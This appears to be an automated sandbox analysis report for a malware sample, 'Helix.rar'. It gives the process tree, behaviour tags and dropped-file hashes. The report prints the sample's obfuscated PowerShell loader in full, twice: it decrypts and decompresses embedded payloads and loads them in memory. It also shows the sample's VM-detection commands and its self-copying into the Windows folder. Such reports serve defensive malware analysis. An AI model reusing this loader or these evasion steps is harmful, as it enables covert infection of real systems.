dllhost.exe 51 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:596
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1012
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f710787b-5729-4049-975c-2162f08e82af}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4032
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{1fb8c1dd-0ce5-4f10-bec7-3ea7b84624b1}2⤵PID:1716
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:668
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:944
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:528
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:620
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1068
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1188 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2840
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1220
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1304
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1352
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1380
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2648
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1472
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1680
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1768
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2016
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:2012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1324
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1440
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2116
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2188
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2660
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2748
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2804
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2820
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2904
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3084
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3420
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3512 -
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Helix.rar"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zO82B24B97\HelixMain.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1760
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives4⤵PID:1952
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"4⤵PID:2408
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives4⤵PID:3488
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"4⤵PID:3520
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function vypn($UUXC){ Invoke-Expression -WarningAction Inquire -Verbose -Debug -InformationAction Ignore '$KcaL=pB[SpBypBspBtepBmpB.SpBecpBurpBipBtpBypB.pBCpBrpBypBppBtpBogpBrpBapBppBhypB.pBApBepBspB]pB:pB:pBCpBrpBeapBtepB(pB);'.Replace('pB', ''); Invoke-Expression -InformationAction Ignore -Debug '$KcaL.VyMoVydVyeVy=[VySVyysVyteVym.VySVyeVycVyuVyrVyiVytVyyVy.VyCrVyyVypVytVyogVyrVyaVypVyhVyyVy.VyCVyiVypVyheVyrMVyoVydeVy]:Vy:VyCBVyC;'.Replace('Vy', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$KcaL.joPajodjodjoinjogjo=[joSyjostjoejomjo.joSjoejocjoujorjoijotyjo.joCjorjoypjotjoojogjorjoajopjohjoyjo.joPajoddjoijongjoMojodjoe]jo:jo:joPKjoCjoSjo7;'.Replace('jo', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$KcaL.MMKeMMyMM=MM[SMMyMMstMMemMM.CMMoMMnMMvMMeMMrMMtMM]MM:MM:MMFrMMoMMmMMBMMasMMeMM6MM4MMSMMtMMrMMiMMnMMg("MMUgMMOMM3MMboMMXMMsRMMEKMMg8MM5MMvMMIMMUMMQMMWMMCMMxMM/MM18MM5MMwMMfMM9RMMiMMjMMqMM5MMaMMKMMqMMoMMjMMAMMMCgMMAMM=");'.Replace('MM', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$KcaL.rkIVrk=rk[rkSyrksrkterkm.rkCorknrkvrkerkrrktrk]rk:rk:rkFrkrorkmrkBrkarkserk6rk4rkSrktrkrrkirknrkg("rkSKrkirkLrkfUrkrrkISrk5trkJ8rkLrkzrkgrkOrkXrkvrkGrkvrkwrk==rk");'.Replace('rk', ''); $SwJu=$KcaL.CreateDecryptor(); $sSPz=$SwJu.TransformFinalBlock($UUXC, 0, $UUXC.Length); $SwJu.Dispose(); $KcaL.Dispose(); $sSPz;}function CcYd($UUXC){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug '$ZDDH=NdNeNdwNd-NdObNdjNdecNdt NdSyNdsNdtNdeNdmNd.NdINdONd.NdMNdemNdoNdrNdyNdStNdrNdeNdaNdmNd(,$UUXC);'.Replace('Nd', ''); Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$ufKT=NdNeNdwNd-NdObNdjNdecNdt NdSyNdsNdtNdeNdmNd.NdINdONd.NdMNdemNdoNdrNdyNdStNdrNdeNdaNdmNd;'.Replace('Nd', ''); Invoke-Expression -Debug -InformationAction Ignore '$NnJR=qANeqAwqA-qAObqAjqAecqAt qASyqAsqAtqAeqAmqA.qAIqAOqA.qACqAomqApqArqAeqAssqAiqAoqAnqA.qAGqAZqAiqApqASqAtrqAeaqAm($ZDDH, qA[IqAOqA.qACoqAmqAprqAesqAsiqAoqAnqA.qACqAoqAmqApqArqAeqAssqAiqAoqAnqAMoqAdqAeqA]qA:qA:qADqAeqAcqAoqAmpqAreqAsqAs);'.Replace('qA', ''); $NnJR.CopyTo($ufKT); $NnJR.Dispose(); $ZDDH.Dispose(); $ufKT.Dispose(); $ufKT.ToArray();}function fzTL($UUXC,$RPXw){ Invoke-Expression -WarningAction Inquire '$uHJC=pD[SpDypDspDtepDmpD.RpDefpDlepDcpDtpDipDopDnpD.pDApDspDspDempDbpDlpDypD]:pD:pDLpDopDapDdpD([byte[]]$UUXC);'.Replace('pD', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$Mdzc=$uHJC.LyEnLytLyrLyyPLyoLyinLyt;'.Replace('Ly', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose '$Mdzcqt.Iqtnqtvqtokqteqt($qtnuqtllqt, $RPXw);'.Replace('qt', '');}$VWGu = 'C:\Users\Admin\AppData\Local\Temp\7zO82B24B97\HelixMain.bat';$host.UI.RawUI.WindowTitle = $VWGu;$ompm=[System.IO.File]::ReadAllText($VWGu).Split([Environment]::NewLine);foreach ($FMIl in $ompm) { if ($FMIl.StartsWith('nytBl')) { $DXtx=$FMIl.Substring(5); break; }}$XlXF=[string[]]$DXtx.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$DIV = CcYd (vypn (Kr[CKroKrnKrveKrrKrt]Kr::KrFrKroKrmKrBKraKrsKreKr6Kr4KrSKrtrKriKrnKrgKr($XlXF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Kr', '');Invoke-Expression -Debug -Verbose -WarningAction Inquire '$rsY = CcYd (vypn (Kr[CKroKrnKrveKrrKrt]Kr::KrFrKroKrmKrBKraKrsKreKr6Kr4KrSKrtrKriKrnKrgKr($XlXF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Kr', '');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$ajC = CcYd (vypn (Kr[CKroKrnKrveKrrKrt]Kr::KrFrKroKrmKrBKraKrsKreKr6Kr4KrSKrtrKriKrnKrgKr($XlXF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Kr', '');fzTL $DIV $null;fzTL $rsY $null;fzTL $ajC (,[string[]] (''));4⤵PID:2968
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2676 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2676 -s 25325⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5116
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C type C:\Users\Admin\AppData\Local\Temp\7zO82B24B97\HelixMain.bat>C:\Windows\$rbx-onimai2\$rbx-CO2.bat5⤵
- Drops file in Windows directory
PID:216 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:3564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "5⤵PID:1844
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4500
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives6⤵PID:4404
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"DADY HARDDISK" /c:"QEMU HARDDISK" /c:"WDS100T2B0A"6⤵PID:4452
-
-
C:\Windows\system32\fsutil.exefsutil fsinfo drives6⤵PID:5080
-
-
C:\Windows\system32\findstr.exefindstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"6⤵PID:1716
-
-
C:\Windows\system32\cmd.execmd.exe /c echo function vypn($UUXC){ Invoke-Expression -WarningAction Inquire -Verbose -Debug -InformationAction Ignore '$KcaL=pB[SpBypBspBtepBmpB.SpBecpBurpBipBtpBypB.pBCpBrpBypBppBtpBogpBrpBapBppBhypB.pBApBepBspB]pB:pB:pBCpBrpBeapBtepB(pB);'.Replace('pB', ''); Invoke-Expression -InformationAction Ignore -Debug '$KcaL.VyMoVydVyeVy=[VySVyysVyteVym.VySVyeVycVyuVyrVyiVytVyyVy.VyCrVyyVypVytVyogVyrVyaVypVyhVyyVy.VyCVyiVypVyheVyrMVyoVydeVy]:Vy:VyCBVyC;'.Replace('Vy', ''); Invoke-Expression -Verbose -InformationAction Ignore -Debug -WarningAction Inquire '$KcaL.joPajodjodjoinjogjo=[joSyjostjoejomjo.joSjoejocjoujorjoijotyjo.joCjorjoypjotjoojogjorjoajopjohjoyjo.joPajoddjoijongjoMojodjoe]jo:jo:joPKjoCjoSjo7;'.Replace('jo', ''); Invoke-Expression -Verbose -WarningAction Inquire -InformationAction Ignore '$KcaL.MMKeMMyMM=MM[SMMyMMstMMemMM.CMMoMMnMMvMMeMMrMMtMM]MM:MM:MMFrMMoMMmMMBMMasMMeMM6MM4MMSMMtMMrMMiMMnMMg("MMUgMMOMM3MMboMMXMMsRMMEKMMg8MM5MMvMMIMMUMMQMMWMMCMMxMM/MM18MM5MMwMMfMM9RMMiMMjMMqMM5MMaMMKMMqMMoMMjMMAMMMCgMMAMM=");'.Replace('MM', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire '$KcaL.rkIVrk=rk[rkSyrksrkterkm.rkCorknrkvrkerkrrktrk]rk:rk:rkFrkrorkmrkBrkarkserk6rk4rkSrktrkrrkirknrkg("rkSKrkirkLrkfUrkrrkISrk5trkJ8rkLrkzrkgrkOrkXrkvrkGrkvrkwrk==rk");'.Replace('rk', ''); $SwJu=$KcaL.CreateDecryptor(); $sSPz=$SwJu.TransformFinalBlock($UUXC, 0, $UUXC.Length); $SwJu.Dispose(); $KcaL.Dispose(); $sSPz;}function CcYd($UUXC){ Invoke-Expression -WarningAction Inquire -InformationAction Ignore -Debug '$ZDDH=NdNeNdwNd-NdObNdjNdecNdt NdSyNdsNdtNdeNdmNd.NdINdONd.NdMNdemNdoNdrNdyNdStNdrNdeNdaNdmNd(,$UUXC);'.Replace('Nd', ''); Invoke-Expression -Verbose -WarningAction Inquire -Debug -InformationAction Ignore '$ufKT=NdNeNdwNd-NdObNdjNdecNdt NdSyNdsNdtNdeNdmNd.NdINdONd.NdMNdemNdoNdrNdyNdStNdrNdeNdaNdmNd;'.Replace('Nd', ''); Invoke-Expression -Debug -InformationAction Ignore '$NnJR=qANeqAwqA-qAObqAjqAecqAt qASyqAsqAtqAeqAmqA.qAIqAOqA.qACqAomqApqArqAeqAssqAiqAoqAnqA.qAGqAZqAiqApqASqAtrqAeaqAm($ZDDH, qA[IqAOqA.qACoqAmqAprqAesqAsiqAoqAnqA.qACqAoqAmqApqArqAeqAssqAiqAoqAnqAMoqAdqAeqA]qA:qA:qADqAeqAcqAoqAmpqAreqAsqAs);'.Replace('qA', ''); $NnJR.CopyTo($ufKT); $NnJR.Dispose(); $ZDDH.Dispose(); $ufKT.Dispose(); $ufKT.ToArray();}function fzTL($UUXC,$RPXw){ Invoke-Expression -WarningAction Inquire '$uHJC=pD[SpDypDspDtepDmpD.RpDefpDlepDcpDtpDipDopDnpD.pDApDspDspDempDbpDlpDypD]:pD:pDLpDopDapDdpD([byte[]]$UUXC);'.Replace('pD', ''); Invoke-Expression -Verbose -Debug -InformationAction Ignore '$Mdzc=$uHJC.LyEnLytLyrLyyPLyoLyinLyt;'.Replace('Ly', ''); Invoke-Expression -Debug -InformationAction Ignore -Verbose '$Mdzcqt.Iqtnqtvqtokqteqt($qtnuqtllqt, $RPXw);'.Replace('qt', '');}$VWGu = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $VWGu;$ompm=[System.IO.File]::ReadAllText($VWGu).Split([Environment]::NewLine);foreach ($FMIl in $ompm) { if ($FMIl.StartsWith('nytBl')) { $DXtx=$FMIl.Substring(5); break; }}$XlXF=[string[]]$DXtx.Split('\');Invoke-Expression -InformationAction Ignore -Debug '$DIV = CcYd (vypn (Kr[CKroKrnKrveKrrKrt]Kr::KrFrKroKrmKrBKraKrsKreKr6Kr4KrSKrtrKriKrnKrgKr($XlXF[0].Replace("#", "/").Replace("@", "A"))));'.Replace('Kr', '');Invoke-Expression -Debug -Verbose -WarningAction Inquire '$rsY = CcYd (vypn (Kr[CKroKrnKrveKrrKrt]Kr::KrFrKroKrmKrBKraKrsKreKr6Kr4KrSKrtrKriKrnKrgKr($XlXF[1].Replace("#", "/").Replace("@", "A"))));'.Replace('Kr', '');Invoke-Expression -InformationAction Ignore -Debug -Verbose '$ajC = CcYd (vypn (Kr[CKroKrnKrveKrrKrt]Kr::KrFrKroKrmKrBKraKrsKreKr6Kr4KrSKrtrKriKrnKrgKr($XlXF[2].Replace("#", "/").Replace("@", "A"))));'.Replace('Kr', '');fzTL $DIV $null;fzTL $rsY $null;fzTL $ajC (,[string[]] (''));6⤵PID:3748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:2960 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2960 -s 22047⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4780
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2960 -s 25007⤵PID:2588
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F7⤵PID:2976
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:4772
-
-
-
-
-
-
-
-
C:\Windows\$nya-onimai2\RqCmrL.exe"C:\Windows\$nya-onimai2\RqCmrL.exe"2⤵
- Executes dropped EXE
PID:2532 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1896
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3612
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3816
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3972
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:3536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
PID:4840
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:4264
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:1672
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:828
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1248
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:4488
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1704
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵PID:3728
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 6e85aba01c9dd929f3f5f2152933fd2b ZRW0ijBmQ0+p+L+/7Zq9GQ.0.1.0.0.01⤵
- Sets service image path in registry
PID:60 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:956
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:2644
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3140
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:4800
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:3520 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 2960 -ip 29602⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5052
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 600 -p 2960 -ip 29602⤵PID:4944
-
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵PID:4604
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
40KB
MD533d136710f217c4534e669d9ca314997
SHA1228a32c57a4b7baf959d5a1aafd64a1f38ae2b08
SHA256ab3b9fdae30c61ae047b30e2fb3a82817d45b04d52eba0041a18471b9de7be1f
SHA5126139cb0e64be80d3e1d741bd84dc10ae6d0fd46acc0339919527e0db4ae65dddccc4870f5ef1e5da279c69004b2be191e7873a89c126678aa12d92c7db120761
-
Filesize
13KB
MD5c91f80f4c899cc716545443b71887fef
SHA11d2c5c1a945584f9ac61cf2f210973744236877c
SHA256abb4e7c556e2bcbc5f85463d9b945e9ea2c0f69a61b17e6392b72e506035ec3e
SHA51262e12b529bb8d40a053e70cca3149fd8557070f25071c30e95bf99a94d53b4092fd5ac7f5f4d25ea097e941af8ee113fa8f50008feded88de05b2d1509843689
-
Filesize
40KB
MD590cbc4d1da22612dcf3f9e834a29aa78
SHA1defd957bbf7155bde6a05125f814d935d5f1ab80
SHA256d0e3cd4c46375c833189bb8460f77cdebe58d3e530fd33b7992b7b6ad1caba3f
SHA51279f6753e1a930c1c80814d77d5892dd485190e423e49d19867648a19cba2801c286877f6ff6ef18398045e0605b90814b4cc094fa449a792959e18ff130b9019
-
Filesize
13KB
MD5532186ca3f09ebcd06ef2a86b27b3f94
SHA12f53899656784088b288f0f9748754a1129ac5d5
SHA256028da61408cff53c0571daa9b152364fefea588d9986b476ababf4614e4f77ff
SHA512dd1f56596212329d197959bdc149b301f403e48be3860c1642b5a81fdf77d307dcd526ccd64b7817ac14d7235c95141fbfdfb16a8bedf672a606f5f4d9c00977
-
Filesize
3KB
MD5bb8306e1bcf2e988e16c1aee4383f269
SHA13f261ea9b6df59d223f7c61adddc7f6f515e6e4e
SHA256859eb6128cadf870e8235e87af15e13e6243b84690f641612be03c8dd83c4b98
SHA512ad95bd6d26de7cea5ddaa4c3d92ced71899be98bac8593fed13b815a25eccd71817300f0cde97d87d3722515691a4a82a7d2d06a832d6181f05ccd73649247d3
-
Filesize
53KB
MD5a26df49623eff12a70a93f649776dab7
SHA1efb53bd0df3ac34bd119adf8788127ad57e53803
SHA2564ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
Filesize
3KB
MD576a18ac328480a11da294618d5d31ffd
SHA10224f6c541f3e833a9bbe76184ec4b2b5487fe62
SHA256e0ed940dd5e72400cd69d53a59216af270adbfd107742485db35b4623ed710e6
SHA512f73d3ec83eff892ca425cc7cacf2e06f77b0edd24a8b5fa4e8ff02349a9653553884e3ee41c650bc17598392da08a8e230eadf129dcac4e0ea1e19d01ac84bbe
-
Filesize
7.4MB
MD5872d30ecbd8d68ca50b770f7a1ec8994
SHA15f775678205d35806713009817b55868146573c6
SHA256e527d303ed4717462721ea6410cbaadf0ab74121fae453746310eb0629d93393
SHA512ffe9082f58140ee54e62649553ec141ff747f3a141ba30d439e467c44a3d2796eaf53971dd33887164174016aa1daf60d35cbfea1abf767c5b30834910df3385
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
36KB
MD5b943a57bdf1bbd9c33ab0d33ff885983
SHA11cee65eea1ab27eae9108c081e18a50678bd5cdc
SHA256878df6f755578e2e79d0e6fd350f5b4430e0e42bb4bc8757afb97999bc405ba4
SHA512cb7253de88bd351f8bcb5dc0b5760d3d2875d39f601396a4250e06ead9e7edeffcd94fa23f392833f450c983a246952f2bad3a40f84aff2adc0f7d0eb408d03c
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
